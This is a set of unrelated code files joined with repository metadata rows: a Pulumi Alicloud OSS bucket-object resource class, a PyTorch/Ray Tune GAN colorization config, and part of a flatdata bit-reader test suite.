:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_md5: The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for computing method.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
:param pulumi.Input[str] expires: Specifies expire date for the the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] kms_key_id: Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
:param pulumi.Input[str] source: The path to the source file being uploaded to the bucket.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BucketObjectArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a resource to put a object(content or file) to a oss bucket.
## Example Usage
### Uploading a file to a bucket
```python
import pulumi
import pulumi_alicloud as alicloud
object_source = alicloud.oss.BucketObject("object-source",
bucket="your_bucket_name",
key="new_object_key",
source="path/to/file")
```
### Uploading a content to a bucket
```python
import pulumi
import pulumi_alicloud as alicloud
example = alicloud.oss.Bucket("example",
bucket="your_bucket_name",
acl="public-read")
object_content = alicloud.oss.BucketObject("object-content",
bucket=example.bucket,
key="new_object_key",
content="the content that you want to upload.")
```
:param str resource_name: The name of the resource.
:param BucketObjectArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BucketObjectArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_md5: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
expires: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BucketObjectArgs.__new__(BucketObjectArgs)
__props__.__dict__["acl"] = acl
if bucket is None and not opts.urn:
raise TypeError("Missing required property 'bucket'")
__props__.__dict__["bucket"] = bucket
__props__.__dict__["cache_control"] = cache_control
__props__.__dict__["content"] = content
__props__.__dict__["content_disposition"] = content_disposition
__props__.__dict__["content_encoding"] = content_encoding
__props__.__dict__["content_md5"] = content_md5
__props__.__dict__["content_type"] = content_type
__props__.__dict__["expires"] = expires
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__["key"] = key
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["server_side_encryption"] = server_side_encryption
__props__.__dict__["source"] = source
__props__.__dict__["content_length"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["version_id"] = None
super(BucketObject, __self__).__init__(
'alicloud:oss/bucketObject:BucketObject',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_length: Optional[pulumi.Input[str]] = None,
content_md5: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
expires: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
version_id: Optional[pulumi.Input[str]] = None) -> 'BucketObject':
"""
Get an existing BucketObject resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] acl: The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
:param pulumi.Input[str] bucket: The name of the bucket to put the file in.
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content: The literal content being uploaded to the bucket.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_length: the content length of request.
:param pulumi.Input[str] content_md5: The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for computing method.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
:param pulumi.Input[str] etag: the ETag generated for the object (an MD5 sum of the object content).
:param pulumi.Input[str] expires: Specifies expire date for the the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] kms_key_id: Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
:param pulumi.Input[str] source: The path to the source file being uploaded to the bucket.
:param pulumi.Input[str] version_id: A unique version ID value for the object, if bucket versioning is enabled.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BucketObjectState.__new__(_BucketObjectState)
__props__.__dict__["acl"] = acl
__props__.__dict__["bucket"] = bucket
__props__.__dict__["cache_control"] = cache_control
__props__.__dict__["content"] = content
__props__.__dict__["content_disposition"] = content_disposition
__props__.__dict__["content_encoding"] = content_encoding
__props__.__dict__["content_length"] = content_length
__props__.__dict__["content_md5"] = content_md5
__props__.__dict__["content_type"] = content_type
__props__.__dict__["etag"] = etag
__props__.__dict__["expires"] = expires
__props__.__dict__["key"] = key
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["server_side_encryption"] = server_side_encryption
__props__.__dict__["source"] = source
__props__.__dict__["version_id"] = version_id
return BucketObject(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def acl(self) -> pulumi.Output[Optional[str]]:
"""
The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
"""
return pulumi.get(self, "acl")
@property
@pulumi.getter
def bucket(self) -> pulumi.Output[str]:
"""
The name of the bucket to put the file in.
"""
return pulumi.get(self, "bucket")
@property
@pulumi.getter(name="cacheControl")
def cache_control(self) -> pulumi.Output[Optional[str]]:
"""
Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "cache_control")
@property
@pulumi.getter
def content(self) -> pulumi.Output[Optional[str]]:
"""
The literal content being uploaded to the bucket.
"""
return pulumi.get(self, "content")
@property
@pulumi.getter(name="contentDisposition")
def content_disposition(self) -> pulumi.Output[Optional[str]]:
"""
Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_disposition")
@property
@pulumi.getter(name="contentEncoding")
def content_encoding(self) -> pulumi.Output[Optional[str]]:
"""
Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_encoding")
@property
@pulumi.getter(name="contentLength")
def content_length(self) -> pulumi.Output[str]:
"""
the content length of request.
"""
return pulumi.get(self, "content_length")
@property
@pulumi.getter(name="contentMd5")
def content_md5(self) -> pulumi.Output[Optional[str]]:
"""
The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for computing method.
"""
return pulumi.get(self, "content_md5")
@property
@pulumi.getter(name="contentType")
def content_type(self) -> pulumi.Output[str]:
"""
A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
"""
return pulumi.get(self, "content_type")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
the ETag generated for the object (an MD5 sum of the object content).
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def expires(self) -> pulumi.Output[Optional[str]]:
"""
Specifies expire date for the the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "expires")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
The name of the object once it is in the bucket.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter(name="serverSideEncryption")
def server_side_encryption(self) -> pulumi.Output[Optional[str]]:
"""
Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
"""
return pulumi.get(self, "server_side_encryption")
@property
@pulumi.getter
def source(self) -> pulumi.Output[Optional[str]]:
"""
The path to the source file being uploaded to the bucket.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter(name="versionId")
def version_id(self) -> pulumi.Output[str]:
"""
A unique version ID value for the object, if bucket versioning is enabled.
"""
return pulumi.get(self, "version_id")
| 47.510563 | 326 | 0.65387 | 5,066 | 40,479 | 5.053296 | 0.047177 | 0.08207 | 0.103359 | 0.105703 | 0.927109 | 0.913516 | 0.892813 | 0.883906 | 0.880352 | 0.858516 | 0 | 0.012595 | 0.236987 | 40,479 | 851 | 327 | 47.566392 | 0.81626 | 0.390029 | 0 | 0.798768 | 1 | 0 | 0.088701 | 0.01042 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166324 | false | 0.002053 | 0.010267 | 0 | 0.277207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f447d0b4d6fc231761d939217a077344668ee663 | 6,614 | py | Python | src/config.py | mps-research/ImageColorizationUsingGANwithLab | e04679b173728119c0e2395eeaf086f5a36d584f | [
"MIT"
] | null | null | null | src/config.py | mps-research/ImageColorizationUsingGANwithLab | e04679b173728119c0e2395eeaf086f5a36d584f | [
"MIT"
] | null | null | null | src/config.py | mps-research/ImageColorizationUsingGANwithLab | e04679b173728119c0e2395eeaf086f5a36d584f | [
"MIT"
] | null | null | null | import torch.nn as nn
from ray import tune
large_netG = {
'encoder': [
{
'in_channels': 1,
'out_channels': 64,
'kernel_size': 3,
'stride': 1,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 64,
'out_channels': 64,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 64,
'out_channels': 128,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 128,
'out_channels': 256,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 256,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 512,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 512,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 512,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
],
'decoder': [
{
'in_channels': 512,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 1024,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 1024,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 1024,
'out_channels': 256,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 512,
'out_channels': 128,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 256,
'out_channels': 64,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 128,
'out_channels': 64,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 128,
'out_channels': 2,
'kernel_size': 3,
'stride': 1,
'padding': 1,
'normalize': True,
'activation_func': nn.ReLU()
},
{
'in_channels': 2,
'out_channels': 2,
'kernel_size': 3,
'stride': 1,
'padding': 1,
'normalize': False,
'activation_func': nn.Tanh()
},
],
}
large_netD = {
'blocks': [
{
'in_channels': 2,
'out_channels': 64,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': False,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 64,
'out_channels': 128,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 128,
'out_channels': 256,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 256,
'out_channels': 512,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 512,
'out_channels': 1024,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 1024,
'out_channels': 1024,
'kernel_size': 4,
'stride': 2,
'padding': 1,
'normalize': True,
'activation_func': nn.LeakyReLU(0.2)
},
{
'in_channels': 1024,
'out_channels': 1,
'kernel_size': 4,
'stride': 1,
'padding': 0,
'normalize': False,
'activation_func': nn.Sigmoid()
},
]
}
netGs = {
'large_netG': large_netG
}
netDs = {
'large_netD': large_netD
}
datasets = {
'places365_20220124': {
'src_dir': '/data/places365_standard',
'dst_dir': '/data/places365_20220124',
'n_classes': 3,
'n_train_samples_per_class': 3000,
'n_val_samples_per_class': 10,
}
}
config = {
'dataset': tune.grid_search(list(datasets.keys())),
'netG': tune.grid_search(list(netGs.keys())),
'netD': tune.grid_search(list(netDs.keys())),
'lrG': tune.grid_search([2e-4]),
'lrD': tune.grid_search([2e-4]),
'p': tune.grid_search([0.7]),
'lambda': tune.grid_search([30, 100, 300]),
'batch_size': 32,
}
| 24.864662 | 55 | 0.404596 | 572 | 6,614 | 4.461538 | 0.131119 | 0.094044 | 0.15047 | 0.172806 | 0.816614 | 0.780564 | 0.780564 | 0.770376 | 0.759796 | 0.759796 | 0 | 0.072452 | 0.451164 | 6,614 | 265 | 56 | 24.958491 | 0.630579 | 0 | 0 | 0.652174 | 0 | 0 | 0.290142 | 0.014515 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007905 | 0 | 0.007905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f489f09aab1d99e9faa0bca31992721b9baf4961 | 215,926 | py | Python | flatdata-py/tests/test_data_access.py | heremaps/flatdata | 42e62c00a25d9b65930c90044578a583efb6ed6d | [
"Apache-2.0"
] | 140 | 2018-01-26T21:59:38.000Z | 2022-02-17T10:23:29.000Z | flatdata-py/tests/test_data_access.py | VeaaC/flatdata | 5df78d89938dbbd1566fa85d417b9674ef402561 | [
"Apache-2.0"
] | 114 | 2018-01-26T17:49:20.000Z | 2021-11-26T13:27:08.000Z | flatdata-py/tests/test_data_access.py | VeaaC/flatdata | 5df78d89938dbbd1566fa85d417b9674ef402561 | [
"Apache-2.0"
] | 22 | 2018-01-26T16:51:24.000Z | 2021-04-27T13:32:44.000Z | from nose.tools import assert_equal
from flatdata.lib.data_access import read_value, write_value
def test_reader():
"""
Following tests were generated from C++ counterparts. Reasoning: python implementation lacks
writers at the moment, and adding them needs insurance that they will not diverge from their
C++ originals.
"""
def _test_reader(buffer, offset, num_bits, is_signed, expected):
assert_equal(read_value(buffer, offset, num_bits, is_signed), expected)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 16, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 15, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 14, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 13, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 12, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 11, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 10, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 9, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 16, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 15, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 14, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 13, False, 1)
